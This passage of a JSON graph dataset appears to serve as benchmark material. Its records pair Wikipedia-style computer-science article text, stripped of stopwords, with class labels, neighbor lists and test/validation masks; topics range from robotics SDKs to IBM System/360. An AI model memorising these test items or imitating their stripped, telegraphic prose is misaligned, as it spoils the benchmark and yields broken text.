sufficiently robust high-performance full-featured use commercial applications yet sufficiently simple experimentation university research environments describe approach orca software released lgpl gpl licenses openrdk open-source software framework robotics developing loosely coupled modules provides transparent concurrency management inter-process via sockets intra-process via shared memory blackboard-based communication linking technique allows input/output data ports conceptual system design modules connecting simulators generic robot drivers provided rock robot construction kit software framework development robotic systems underlying component model based orocos rtt real time toolkit rock provides tools required set run high-performance reliable robotic systems wide variety applications research industry contains rich collection ready use drivers modules use system easily extended adding new components isaac nvidia® isaac software development kit sdk developer toolbox accelerating development deployment artificial intelligence-powered robots sdk includes isaac robot engine packages high-performance robotics algorithms perform perception navigation hardware reference applications isaac sim virtual robotics laboratory high-fidelity 3d world simulator accelerates research design development robotics reducing cost risk developers quickly easily train test robots detailed highly realistic scenarios open source community version available github suppported hardware platform includes bom details refer kaya-robot ros robot operating system collection software frameworks robot software development heterogeneous computer cluster ros provides standard operating system services hardware abstraction low-level device control implementation commonly used functionality message-passing processes package management yarp open-source software package written c++ interconnecting sensors processors actuators robots",
    "neighbors": [
      968,
      8122,
      3412,
      6128
    ],
    "mask": "Test"
  },
  {
    "node_id": 10495,
    "label": 4,
    "text": "Racetrack_problem:racetrack problem racetrack problem specific instance type race condition racetrack problem flaw system process whereby output and/or result process unexpectedly critically dependent sequence timing events run circular pattern note problem semantically different race condition circular nature problem term originates idea two signals racing circular motion influence output first racetrack problems occur electronics systems especially logic circuits computer software especially multithreaded distributed programs",
    "neighbors": [
      6184,
      7446
    ],
    "mask": "Test"
  },
  {
    "node_id": 10496,
    "label": 4,
    "text": "Webroot_Window_Washer:webroot window washer webroot window washer tool designed protect user privacy permanently deleting traces web browsing history personal information files computer running microsoft windows currently versions planned program longer updated window washer .95 first launch product originally designed remove unwanted files accumulate computer ’ hard drive surfing internet areas trace file removal include internet history address bar cache cookies recent documents list recycle bin icq history temporary internet files stored computer web search window washer total removal feature completely erases everything found hard drive including operating system beginning 1.0 version launch mid-1998 new process added file deletion process known “ bleaching ” file encryption process seeks files random characters names destroys permanently removes computer ’ hard drive custom cookie selection feature also added allow users select specific cookies excluded deletion process making homepages internet preferences logins passwords stored future visits website software updates also included ability clean chk files created scandisk third party programs files activex java downloaded internet explorer 2.0 version updates launched late 1998 primarily designed able match advancements visual improvements windows 95/98 nt 4.0 window washer adapted user interface allow users use software multiple users programming new window ’ operations systems version window washer also supported netscape 4.5 internet explorer 5.0 well added features came along keyword storing feature search engines personal information stored entered online auto-complete form users also gained ability reassign wash path commonly washed items command-line washes routine cleaning cycles reprogrammed include cleaning information stored windows registry aka “ streams ” deletes tracking paths past actions user additional features 2.0 launch included real-time counter drive space restored items washed added status window custom plug-ins also made available beginning version history pathways left behind popular media programs realplayer adobe acrobat would included wash cycles customizable user interface added feature 3.0 version launch early 2000 additional third party plug-ins made available download well ability wash recent history cache windows media player increased compatibility also added netscape 6 msn explorer 6 aol 6 interface updated include easier custom configuration preferences settings notable upgrade 4.0 version addition automatic check updates feature release also included enhanced password security improvement destroying deleting function bleaching increased efficiency cleaning sweeps overall version 4.0 made window washer compatible aol 7.0 beta netscape 6.1 windows xp internet explorer 6.0 window washer 5.0 eventually included requested feature one-click personal privacy safety option shreds permanently destroys deletes files folders version 5.0 also came built safety feature prompts user confirm requested delete files categories personal files commonly stored operating system files saved files unintentionally deleted 5.0 features included cookie keeper helps maintain internet settings personal favorites option organize frequently visited sites without deleted clean-up cycles 6.0 product launch included completely new user interface well cleaning internet browsers including mozilla firefox version 6.6 latest version product available makes window washer compatible windows 7 windows vista operating system 32 bit 64 bit also includes cleaning functions internet explorer 8",
    "neighbors": [
      2257,
      9713,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10497,
    "label": 0,
    "text": "ClearForest:clearforest clearforest israeli software company developed marketed text analytics text mining solutions founded 1998 clearforest headquarters outside boston development center yehuda company acquired reuters april 2007 markets services names calais opencalais onecalais clearforest previously venture-backed last funding round led greylock ventures closed 2005 investors included db capital partners pitango walden israel booz allen jp morgan partners harbourvest partners february 7 2008 reuters announced launch open calais named-entity recognition semantic analysis service uses clearforest technology april 30 2007 reuters announced would acquire clearforest sources estimate acquisition 25 million clearforest offers several hosted solutions including clearforest also offers text analytics solutions targeted specific business problems including",
    "neighbors": [
      8440,
      2059,
      5078
    ],
    "mask": "None"
  },
  {
    "node_id": 10498,
    "label": 1,
    "text": "UK_Detector_Finds_Database:uk detector finds database uk detector finds database initiative members metal-detecting community united kingdom promote good practice within hobby online facility detectorists record finds ensure information preserved future generations joining scheme immediate access database uploading details finds instructions provided stage process personal gallery created user entering first record grows may browsed searched way personal database items submitted reviewed scheme team experts full identification details provided confirmed soon possible users also able record detector make model performance different circumstances different types find may assessed",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 10499,
    "label": 2,
    "text": "IncludeOS:includeos includeos minimal open source unikernel operating system cloud services iot includeos allows users run c++ applications cloud without operating system includeos adds operating system functionality application allowing oneself create 'virtual machine application includeos applications boot tens milliseconds require megabytes disk memory minimalist architecture includeos means virtual memory space turn therefore concept system calls user space",
    "neighbors": [
      2560,
      6155,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      7217,
      10803,
      10809,
      576,
      2625,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      9835,
      7285,
      4727,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      6296,
      2201,
      9370,
      9882,
      9887,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      5840,
      7382,
      8410,
      9436,
      1247,
      11489,
      7403,
      242,
      5363,
      9466,
      9468,
      1278,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      6974,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      7507,
      7511,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11675,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10500,
    "label": 3,
    "text": "Palm_IIIc:palm iiic palm iiic first colour pda made palm inc started sold 1998 ran palm os 3.5 first palm os version native colour support supported paletted 8-bit colour modes machine tft lcd bright indoors palm iiic features classic iii-series connector 8mb ram 20mhz dragonball ezi cpu unit also lithium ion rechargeable battery slightly modified version original palm iii chassis",
    "neighbors": [
      2308,
      6790,
      3606,
      8982,
      6178,
      5164,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952,
      9598
    ],
    "mask": "Test"
  },
  {
    "node_id": 10501,
    "label": 3,
    "text": "PowerPC_7xx:powerpc 7xx powerpc 7xx family third generation 32-bit powerpc microprocessors designed manufactured ibm motorola freescale semiconductor family called powerpc g3 well-known customer apple inc. introduced november 10 1997 term powerpc g3 often incorrectly imagined microprocessor fact number microprocessors different vendors used designations applied macintosh computers powerbook g3 multicolored imacs ibooks several desktops including beige blue white power macintosh g3s low power requirements small size made processors ideal laptops name lived last days apple ibook 7xx family also widely used embedded devices like printers routers storage devices spacecraft video game consoles 7xx family shortcomings namely lack smp support simd capabilities relatively weak fpu motorola 74xx range processors picked 7xx left powerpc 740 750 codename arthur introduced late 1997 evolutionary replacement powerpc 603e enhancements included faster 60x system bus 66 mhz larger l1 caches 32 kb instruction 32 kb data second integer unit enhanced floating point unit higher core frequency 750 support optional 256 512 1024 kb external unified l2 cache cache controller cache tags on-die cache accessed via dedicated 64-bit bus 740 750 added dynamic branch prediction 64-entry branch target instruction cache btic dynamic branch prediction uses recorded outcome branch stored 512-entry 2-bit branch history table bht predict outcome btic caches first two instructions branch target 740/750 models 6.35 million transistors initially manufactured ibm motorola aluminium based fabrication process die measured 67 mm 0.26 μm reached speeds 366 mhz consuming 7.3 w. 1999 ibm fabricated versions 0.20 μm process copper interconnects increased frequency 500 mhz decreased power consumption 6 w die size 40 mm 740 slightly outperformed pentium ii consuming far less power smaller die off-die l2 cache 750 increased performance approximately 30 situations design successful quickly surpassed powerpc 604e integer performance causing planned 604 successor scrapped powerpc 740 completely pin compatible older 603 allowing upgrades powerbook 1400 2400 even prototype powerbook 500/g3 750 l2 cache bus required pins thus different package 360-pin ball grid array bga powerpc 750 used many computers apple including original imac radiation-hardened processor based powerpc 750 intended use high radiation environments experienced board satellites spacecraft rad750 released purchase 2001 mars science laboratory curiosity mars reconnaissance orbiter spacecraft rad750 board processor 10.4 million transistors manufactured bae systems using either 250 150 nm process die area 130 mm² operates 110 200 mhz cpu withstand 200,000 1,000,000 rads temperature ranges −55 125 °c rad750 packaging logic functions price tag excess us 200,000 high price mainly due radiation hardening revisions powerpc 750 architecture manufacturing stringent quality control requirements extended testing processor chip manufactured motorola revised 740/750 design 1998 shrunk die size 51 mm thanks newer aluminium based fabrication 0.22 μm speeds increased 600 mhz 755 used ibook models model motorola chose keep developing 750 processors favour powerpc 7400 processor cores ibm continued develop powerpc 750 line introduced powerpc 750cx code-named sidewinder 2000 256 kib on-die l2 cache increased performance reducing power consumption complexity 400 mhz drew 4 w. 750cx 20 million transistors including l2 cache die size 43 mm 0.18 μm copper process 750cx used one imac ibook revision 750cxe codename anaconda introduced 2001 minor revision 750cx increased frequency 700 memory bus 100 mhz 133 mhz 750cxe also featured improved floating-point performance 750cx several ibook models last g3-based imac used processor cost reduced version 750cxe called 750cxr available lower frequencies gekko custom central processor nintendo gamecube game console based powerpc 750cxe adds 50 new instructions well modified fpu capable simd functionality 256 kib die l2 cache operates 485 mhz 162 mhz memory bus fabricated ibm 180 nm process die 43 mm large 750fx code-named sahara came 2002 increased frequency 900 mhz bus speed 166 mhz on-die l2 cache 512 kib also featured number improvements memory subsystem enhanced faster 200 mhz 60x bus controller wider l2 cache bus ability lock parts l2 cache manufactured using 0.13 μm copper based fabrication low-k dielectric silicon insulator technology 750fx 39 million transistors die size 35 mm consumes less 4 w 800 mhz typical loads last g3 type processor used apple employed ibook g3 low powered version 750fx available called 750fl 750fx powers nasa orion multi-purpose crew vehicle orion using honeywell international inc. flight computer originally built boeing 787 jet airliner 750gx codenamed gobi revealed 2004 latest powerful 7xx processor ibm on-die 1 mb l2 cache top frequency 1.1 ghz support bus speeds 200 mhz among enhancements compared 750fx manufactured using 0.13 μm process copper interconnects low-k dielectric silicon insulator technology 750gx 44 million transistors die size 52 mm consumes less 9 w 1 ghz typical loads low-power version 750gx available called 750gl 750vx codenamed mojave rumored confirmed canceled version 7xx line would powerful featured version date 4mb die l3 cache 400mhz ddr front side bus implementation altivec used powerpc 970 expected clock high 1.8 ghz starting 1.5 ghz reported additional pipeline stages advanced power management features reported finished ready production december 2003 said timing late get significant orders seeing apple ibook line switched g4s october year thus quickly fell roadmap never released heard since follow chips planned 750vxe would surpassed 2 ghz 750cl evolved 750cxe speeds ranging 400 mhz 1 ghz system bus 240 mhz l2 cache prefetch features graphics related instructions added improve performance added graphics-related functions match closely ones found gekko processor likely 750cl shrink processor general purpose use 750cl manufactured using 90 nm copper based fabrication low-k dielectric silicon insulator technology features 20 million transistors 16 mm die draws 2.7 w 600 mhz 9.8 w 1 ghz cpu wii virtually identical 750cl runs 729 mhz frequency supported stock 750cl measures 4.2 x 4.5 mm 18.9 mm smaller half size gekko microprocessor 43 mm incorporated gamecube first release cpu wii u believed evolution broadway architecture largely unconfirmed characteristics triple core cpu runs 1.24 ghz manufactured 45 nm process ibm ceased publish roadmap 750 family favor marketing custom processor vendor given ibm resources 750 core produced new features long willing buyer particular ibm public plans produce ordinary 750-based microprocessor process smaller 90 nm effectively phasing commodity chip competitive markets networking equipment however ibm make espresso processor nintendo 750 based design improvements multiprocessor support part triple core new 45 nm fabrication process edram instead regular l2 cache unknown changes made design 2015 rochester electronics started providing legacy support devices freescale discontinued 750 designs favor designs based powerpc e500 core powerquicc iii list complete list known 750 based designs pictures illustrations scale",
    "neighbors": [
      6663,
      5642,
      1548,
      1042,
      2073,
      1563,
      8231,
      11314,
      8761,
      6715,
      576,
      9302,
      1635,
      7269,
      3185,
      4211,
      5235,
      7286,
      10872,
      7299,
      1158,
      4743,
      7302,
      7305,
      6311,
      4264,
      9391,
      5297,
      11447,
      11449,
      1725,
      8896,
      10945,
      6878,
      8931,
      10985,
      9964,
      3319,
      3323,
      6914,
      3844,
      4868,
      3846,
      6415,
      4881,
      1309,
      6949,
      1321,
      10543,
      9020,
      336,
      8530,
      342,
      3932,
      11613,
      3936,
      869,
      8048,
      8058,
      3467,
      1933,
      3472,
      7065,
      3493,
      8102,
      4017,
      1461,
      8120,
      1983,
      1985,
      10180,
      3017,
      3540,
      10214,
      10224,
      8700,
      8190
    ],
    "mask": "Test"
  },
  {
    "node_id": 10502,
    "label": 4,
    "text": "Democratic_Congressional_Campaign_Committee_cyber_attacks:democratic congressional campaign committee cyber attacks friday july 29 2016 democratic congressional campaign committee reported computer systems infiltrated strongly believed us intelligence sources infiltrator groups russian foreign intelligence groups breached democratic national committee computer systems groups known fancy bear cozy bear sofacy crowdstrike assisted efforts deal dccc breach significant concern russians attempting influence 2016 presidential campaign russian cyber intrusions united states government private sector computer systems significantly increased u.s imposed sanctions russia invasion crimea ukraine president obama preference publicize cyber attacks",
    "neighbors": [
      1024,
      8320,
      3843,
      5636,
      5764,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      176,
      7601,
      1970,
      9395,
      9904,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      1882,
      4314,
      7515,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2558,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 10503,
    "label": 4,
    "text": "Areca_Backup:areca backup areca backup personal file backup software developed java released gnu general public license gpl 2 areca backup includes backup engine well graphical user interface command-line interface application includes following features areca also provides tools needed handle archives storage modes areca handle multiple storage modes backup types areca handle following types backups areca uses file size last modification time detect modified files one attributes modified whatever value file flagged modified allows fast detection modified files areca downloadable pre-packaged linux windows 2000/windows xp windows vista also runs operating system provided java runtime environment installed version 1.4.2 later translated chinese simplified chinese traditional czech danish dutch english french german hungarian italian japanese russian spanish swedish",
    "neighbors": [
      9025,
      7364,
      6280,
      5677,
      1358,
      7983,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 10504,
    "label": 7,
    "text": "Panzura:panzura panzura privately held company based us markets computer data storage products panzura founded 2008 randy chou john taylor members founding software team aruba networks company incorporated delaware first headquartered san jose california funded november 2010 12 million company initially funded matrix partners khosla ventures chevron technology ventures arm chevron corporation june 2012 opus capital led round 15 million funding included previous investors round 25 million funding june 2013 included meritech capital partners july 2013 flash memory maker sandisk announced new strategic investor alex lam sandisk joining board observer based campbell california 2013 panzura provides cloud storage data protection specialized cloud storage controllers panzura products accessed using network-attached storage nas protocols allow users secure access latest versions file widely distributed locations industry analysts sometimes call kind product cloud storage gateway available hardware appliance called quicksilver software-only use vmware esx quicksilver best show award may 2012 interop trade show panzura global cloud storage system integrates cloud storage platforms including amazon web services cleversafe emc atmos google hp cloud services nirvanix panzura received three patents technology 2013 panzura offers proprietary software delivered hardware appliances virtual machine licenses installed locally backup actively archive centralize data remote location architectural firm diller scofidio renfro credited panzura technology speeding backup recovery data hurricane sandy california state university northridge also used technology backing data march 2013 panzura announced achieved fips 140-2 security certification national institute standards technology use us government agencies contractors",
    "neighbors": [
      7248,
      1801,
      420,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 10505,
    "label": 1,
    "text": "Database_tuning:database tuning database tuning describes group activities used optimize homogenize performance database usually overlaps query tuning refers design database files selection database management system dbms application configuration database environment operating system cpu etc. database tuning aims maximize use system resources perform work efficiently rapidly possible systems designed manage use system resources still much room improve efficiency customizing settings configuration database dbms hardware software configuration disk subsystems examined raid levels configuration block stripe size allocation configuration disks controller cards storage cabinets external storage systems sans transaction logs temporary spaces heavy consumers i/o affect performance users database placing appropriately crucial frequently joined tables indexes placed requested file storage retrieved parallel separate disks simultaneously frequently accessed tables indexes placed separate disks balance i/o prevent read queuing dbms tuning refers tuning dbms configuration memory processing resources computer running dbms typically done configuring dbms resources involved shared host system tuning dbms involve setting recovery interval time needed restore state data particular point time assigning parallelism breaking work single query tasks assigned different processing resources network protocols used communicate database consumers memory allocated data execution plans procedure cache much faster access data memory data storage maintaining sizable cache data makes activities perform faster consideration given work space caching execution plans procedures means reused instead recompiled needed important take much memory possible leaving enough processes os use without excessive paging memory storage processing resources sometimes assigned specific activities improve concurrency server eight processors six could reserved dbms maximize available processing resources database utilizes machine learning learn evaluate performance various workloads database maintenance includes backups column statistics updates defragmentation data inside database files heavily used database transaction log grows rapidly transaction log entries must removed log make room future entries frequent transaction log backups smaller interrupt database activity shorter periods time dbms use statistic histograms find data range table index statistics updates scheduled frequently sample much underlying data possible accurate updated statistics allow query engines make good decisions execution plans well efficiently locate data defragmentation table index data increases efficiency accessing data amount fragmentation depends nature data changed time amount free space database pages accept inserts data without creating additional pages",
    "neighbors": [
      2688,
      9481,
      10258,
      11667,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      3366,
      8742,
      2344,
      5550,
      7983,
      5808,
      10418,
      9527,
      3768,
      5051,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      5953,
      11457,
      8518,
      72,
      10699,
      5840,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467,
      3454
    ],
    "mask": "Test"
  },
  {
    "node_id": 10506,
    "label": 9,
    "text": "Server-side_scripting:server-side scripting server-side scripting technique used web development involves employing scripts web server produce response customized user client request website alternative web server deliver static web page scripts written number server-side scripting languages available see server-side scripting distinguished client-side scripting embedded scripts javascript run client-side web browser techniques often used together server-side scripting often used provide customized interface user scripts may assemble client characteristics use customizing response based characteristics user requirements access rights etc server-side scripting also enables website owner hide source code generates interface whereas client-side scripting user access code received client down-side use server-side scripting client needs make requests network server order show new information user via web browser requests slow experience user place load server prevent use application user disconnected server server serves data commonly used manner example according http ftp protocols users may choice number client programs modern web browsers request receive data using protocols case specialized applications programmers may write server client communications protocol used one another programs run user local computer without ever sending receiving data network considered clients operations programs would considered client-side operations netscape introduced implementation javascript server-side scripting netscape enterprise server first released december 1994 soon releasing javascript browsers server-side scripting later used early 1995 fred dufresne developing first web site boston television station wcvb technology described us patent 5835712 patent issued 1998 owned open invention network oin 2010 oin named fred dufresne distinguished inventor work server-side scripting today variety services use server-side scripting deliver results back client paid free service example would wolframalpha computational knowledge engine computes results outside clients environment returns computed result back commonly used service google proprietary search engine searches millions cached results related user specified keyword returns ordered list links back client apple siri application also employs server-side scripting outside web application application takes input computes result returns result back client earlier days web server-side scripting almost exclusively performed using combination c programs perl scripts shell scripts using common gateway interface cgi scripts executed operating system results served back web server many modern web servers directly execute on-line scripting languages asp jsp perl php ruby either web server via extension modules e.g mod_perl mod_php web server example webdna includes embedded database system either form scripting i.e. cgi direct execution used build complex multi-page sites direct execution usually results less overhead lower number calls external interpreters dynamic websites sometimes use custom web application servers glassfish plack python base http server library although may consider server-side scripting using dynamic web-based scripting techniques developers must keen understanding logical temporal physical separation client server user action trigger execution server-side code example developer working classic asp must explicitly cause user browser make request back web server creating interactions easily consume much development time lead unreadable code server-side scripts completely processed servers instead clients clients request page containing server-side scripts applicable server processes scripts returns html page client number server-side scripting languages available including",
    "neighbors": [
      3462,
      8582,
      1802,
      9229,
      11154,
      10387,
      1556,
      8858,
      4507,
      1435,
      9245,
      3876,
      10020,
      11688,
      4777,
      9981,
      10026,
      7212,
      5677,
      10284,
      7983,
      4658,
      692,
      2485,
      9780,
      1468,
      4797,
      7364,
      8644,
      1223,
      5319,
      5833,
      10186,
      11466,
      3920,
      9808,
      5593,
      5849,
      1244,
      6366,
      225,
      865,
      10593,
      7784,
      8554,
      7147,
      9834,
      8689,
      6002,
      9841,
      119,
      1145,
      11386,
      124,
      2045,
      9726
    ],
    "mask": "None"
  },
  {
    "node_id": 10507,
    "label": 9,
    "text": "Asynchronous_module_definition:asynchronous module definition asynchronous module definition amd specification programming language javascript defines application programming interface api defines code module dependencies loads asynchronously desired implementations amd provide following benefits addition loading multiple javascript files runtime amd implementations allow developers encapsulate code smaller logically-organized files way similar programming languages java production deployment developers concatenate minify javascript modules based amd api one file traditional javascript amd specification implemented dojo toolkit requirejs libraries",
    "neighbors": [
      1409,
      259,
      3462,
      6791,
      8854,
      4378,
      8605,
      3743,
      7455,
      803,
      5677,
      3761,
      11060,
      438,
      5311,
      2880,
      65,
      7871,
      9152,
      4171,
      11087,
      339,
      84,
      4822,
      4056,
      5592,
      9560,
      603,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      10991,
      10097,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 10508,
    "label": 3,
    "text": "IBM_System/360:ibm system/360 ibm system/360 s/360 family mainframe computer systems announced ibm april 7 1964 delivered 1965 1978 first family computers designed cover complete range applications small large commercial scientific design made clear distinction architecture implementation allowing ibm release suite compatible designs different prices partially compatible model 44 expensive systems use microcode implement instruction set features 8-bit byte addressing binary decimal hexadecimal floating-point calculations launch system/360 family introduced ibm solid logic technology slt new technology start powerful smaller computers slowest system/360 model announced 1964 model 30 could perform 34,500 instructions per second memory 8 64 kb high performance models came later 1967 ibm system/360 model 91 could 16.6 million instructions per second larger 360 models could 8 mb main memory though main memory big unusual—a large installation might little 256 kb main storage 512 kb 768 kb 1024 kb common 8 megabytes slower 8 microsecond large capacity storage lcs also available ibm 360 extremely successful market allowing customers purchase smaller system knowledge would always able migrate upward needs grew without reprogramming application software replacing peripheral devices many consider design one successful computers history influencing computer design years come chief architect system/360 gene amdahl project managed fred brooks responsible chairman thomas j. watson jr commercial release piloted another watson lieutenants john r. opel managed launch ibm ’ system 360 mainframe family 1964 application-level compatibility restrictions system/360 software maintained present day system z mainframe servers contrasting at-the-time normal industry practice ibm created entire new series computers small large low- high-performance using instruction set two exceptions specific markets feat allowed customers use cheaper model upgrade larger systems needs increased without time expense rewriting software introduction system/360 business scientific applications used different computers different instruction sets operating systems different-sized computers also instruction sets ibm first manufacturer exploit microcode technology implement compatible range computers widely differing performance although largest fastest models hard-wired logic instead flexibility greatly lowered barriers entry vendors customers choose machines could outgrow machines potentially powerful thus costly meant many companies simply buy computers ibm initially announced series six computers forty common peripherals ibm eventually delivered fourteen models including rare one-off models nasa least expensive model model 20 little 4096 bytes core memory eight 16-bit registers instead sixteen 32-bit registers system/360 models instruction set subset used rest range initial announcement 1964 included models 30 40 50 60 62 70 first three low- middle-range systems aimed ibm 1400 series market three first shipped mid-1965 last three intended replace 7000 series machines never shipped replaced 65 75 first delivered november 1965 january 1966 respectively later additions low-end included models 20 1966 mentioned 22 1971 25 1968 model 20 several sub-models sub-model 5 higher end model model 22 recycled model 30 minor limitations smaller maximum memory configuration slower i/o channels limited slower lower-capacity disk tape devices 30 model 44 1966 specialized model designed scientific computing real-time computing process control featuring additional instructions storage-to-storage instructions five complex instructions eliminated succession high-end machines included model 67 1966 mentioned briefly anticipated 64 66 85 1969 91 1967 anticipated 92 95 1968 195 1971 85 design intermediate system/360 line follow-on system/370 basis 370/165 system/370 version 195 include dynamic address translation implementations differed substantially using different native data path widths presence absence microcode yet extremely compatible except specifically documented models architecturally compatible 91 example designed scientific computing provided out-of-order instruction execution could yield imprecise interrupts program trap occurred several instructions read lacked decimal instruction set used commercial applications new features could added without violating architectural definitions 65 dual-processor version m65mp extensions inter-cpu signalling 85 introduced cache memory models 44 75 91 95 195 implemented hardwired logic rather microcoded models model 67 announced august 1965 first production ibm system offer dynamic address translation virtual memory hardware support time-sharing dat commonly referred mmu experimental one-off unit built based model 40 67 ibm announced models 64 66 dat versions 60 62 almost immediately replaced 67 time 60 62 replaced 65 dat hardware would reappear s/370 series 1972 though initially absent series like close relative 65 67 also offered dual cpus ibm stopped marketing system/360 models end 1977 ibm existing customers large investment software executed second-generation machines several models offered option emulation customer previous computer using combination special hardware special microcode emulation program used emulation instructions simulate target system old programs could run new machine however customers initially halt computer load emulation program ibm later added features modified emulator programs allow emulation 1401 1440 1460 1410 7010 control operating system model 85 later system/370 maintained precedent retaining emulation options allowing emulator programs execute operating system control alongside native programs system/360 excepting model 20 replaced compatible system/370 range 1970 model 20 users targeted move ibm system/3 idea major breakthrough fs technology dropped mid-1970s cost-effectiveness continuity reasons later compatible ibm systems include 4300 family 308x family 3090 es/9000 9672 families system/390 family ibm z series computers mostly identical compatible terms machine code architecture system/360 included amdahl 470 family successors hitachi mainframes univac 9000 series fujitsu facom rca spectra 70 series english electric system 4 system 4 machines built license rca rca sold spectra series univac became univac series 70 univac also developed univac series 90 successors 9000 series series 70 soviet union produced system/360 clone named es evm ibm 5100 portable computer introduced 1975 offered option execute system/360 apl.sv programming language hardware emulator ibm used approach avoid costs delay creating 5100-specific version apl special radiation-hardened otherwise somewhat modified system/360s form system/4 pi avionics computer used several fighter bomber jet aircraft complete 32-bit ap-101 version 4 pi machines used replicated computing nodes fault-tolerant space shuttle computer system five nodes u.s. federal aviation administration operated ibm 9020 special cluster modified system/360s air traffic control 1970 1990s 9020 software apparently still used via emulation newer hardware system/360 introduced number industry standards marketplace system/360 series computer system architecture specification specification makes assumptions implementation rather describes interfaces expected behavior implementation architecture describes mandatory interfaces must available implementations optional interfaces aspects architecture optional features models system/360 except model 20 model 44 implemented specification binary arithmetic logical operations performed register-to-register memory-to-register/register-to-memory standard feature commercial instruction set option installed packed decimal arithmetic could performed memory-to-memory memory-to-register operations scientific instruction set feature installed provided access four floating point registers could programmed either 32-bit 64-bit floating point operations models 85 195 could also operate 128-bit extended-precision floating point numbers stored pairs floating point registers software provided emulation models system/360 used 8-bit byte 32-bit word 64-bit double-word 4-bit nibble machine instructions operators operands could contain register numbers memory addresses complex combination instruction options resulted variety instruction lengths formats memory addressing accomplished using base-plus-displacement scheme registers 1 f 15 displacement encoded 12 bits thus allowing 4096-byte displacement 0-4095 offset address put base register register 0 could used base register index register branch address register 0 reserved indicate address first 4 kb memory register 0 specified described value 0x00000000 implicitly input effective address calculation place whatever value might contained within register 0 specified branch address register branch taken content register 0 ignored side effect instruction performed specific behavior permitted initial execution interrupt routines since base registers would necessarily set 0 first instruction cycles interrupt routine n't needed ipl initial program load boot one always clear register without need save exception model 67 addresses real memory addresses virtual memory available ibm mainframes system/370 series model 67 introduced virtual memory architecture mts cp-67 tss/360 used—but ibm mainline system/360 operating systems system/360 machine-code instructions 2 bytes long memory operands 4 bytes long one operand 6 bytes long two operands instructions always situated 2-byte boundaries operations like mvc move-characters hex d2 move 256 bytes information moving 256 bytes data required multiple mvc operations system/370 series introduced family powerful instructions mvcl move-characters-long instruction supports moving 16 mb single block operand two bytes long typically representing address 4-bit nibble denoting base register 12-bit displacement relative contents register range 000–fff shown hexadecimal numbers address corresponding operand contents specified general-purpose register plus displacement example mvc instruction moves 256 bytes length code 255 hexadecimal ff base register 7 plus displacement 000 base register 8 plus displacement 001 would coded 6-byte instruction d2ff 8001 7000 operator/length/address1/address2 system/360 designed separate system state problem state provided basic level security recoverability programming errors problem user programs could modify data program storage associated system state addressing data operation exception errors made machine enter system state controlled routine operating system could try correct terminate program error similarly could recover certain processor hardware errors machine check routines peripherals interfaced system via channels channel specialized processor instruction set optimized transferring data peripheral main memory modern terms could compared direct memory access dma initially two types channels byte-multiplexer channels known time simply multiplexor channels connecting slow speed devices card readers punches line printers communications controllers selector channels connecting high speed devices disk drives tape drives data cells drums every system/360 except model 20 standard 360 byte-multiplexer channel 1 selector channels smaller models model 50 integrated channels larger models model 65 channels large separate units separate cabinets ibm 2860 2870 60 62 70 allowed 2860 selector channels assumption would smaller 360s attached would slow-speed work byte-multiplexer channel able handle i/o to/from several devices simultaneously device highest rated speeds hence name multiplexed i/o devices onto single data path main memory devices connected byte-multiplexer channel configured operate 1-byte 2-byte 4-byte burst mode larger blocks data used handle progressively faster devices example 2501 card reader operating 600 cards per minute would 1-byte mode 1403-n1 printer would burst mode also byte-multiplexer channels larger models optional selector subchannel section would accommodate tape drives byte-multiplexor channel address typically 0 selector subchannel addresses c0 ff thus tape drives system/360 commonly addressed 0c0-0c7 common byte-multiplexer addresses 00a 2501 card reader 00c/00d 2540 reader/punch 00e/00f 1403-n1 printers 010-013 3211 printers 020-0bf 2701/2703 telecommunications units addresses still commonly used z/vm virtual machines system/360 models 40 50 integrated 1052-7 console usually addressed 01f however connected byte-multiplexer channel rather direct internal connection mainframe model 30 attached different model 1052 1051 control unit models 60 75 also use 1052-7 selector channels enabled i/o high speed devices storage devices attached control unit channel control unit let clusters devices attached channels higher speed models multiple selector channels could operate simultaneously parallel improved overall performance control units connected channels bus tag cable pairs bus cables carried address data information tag cables identified data bus general configuration channel connect devices chain like mainframe—control unit x—control unit y—control unit z control unit assigned capture range addresses services example control unit x might capture addresses 40-4f control unit c0-df control unit z 80-9f capture ranges multiple 8 16 32 64 128 devices aligned appropriate boundaries control unit turn one 